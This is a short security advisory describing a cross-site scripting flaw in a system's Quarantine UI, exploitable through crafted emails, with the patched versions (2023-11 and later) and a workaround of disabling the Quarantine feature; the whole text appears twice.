Impact
A Cross-Site Scripting (XSS) vulnerability has been identified within the Quarantine UI of the system. This vulnerability poses a significant threat to administrators who utilize the Quarantine feature, as it allows malicious actors to execute arbitrary code within the context of the admin's session.
Exploitation of this vulnerability occurs when an attacker sends a carefully crafted email containing malicious JavaScript code. Upon opening or previewing the email within the Quarantine UI, the injected code is executed, enabling the attacker to compromise the administrator's session. This can lead to unauthorized access, data manipulation, or the initiation of further attacks within the system.
Patches
Versions including 2023-11 and later
Workarounds
Disable Quarantine feature under System -> Configuration -> Options -> Quarantine
Impact
A Cross-Site Scripting (XSS) vulnerability has been identified within the Quarantine UI of the system. This vulnerability poses a significant threat to administrators who utilize the Quarantine feature, as it allows malicious actors to execute arbitrary code within the context of the admin's session.
Exploitation of this vulnerability occurs when an attacker sends a carefully crafted email containing malicious JavaScript code. Upon opening or previewing the email within the Quarantine UI, the injected code is executed, enabling the attacker to compromise the administrator's session. This can lead to unauthorized access, data manipulation, or the initiation of further attacks within the system.
Patches
Versions including 2023-11 and later
Workarounds
Disable Quarantine feature under System -> Configuration -> Options -> Quarantine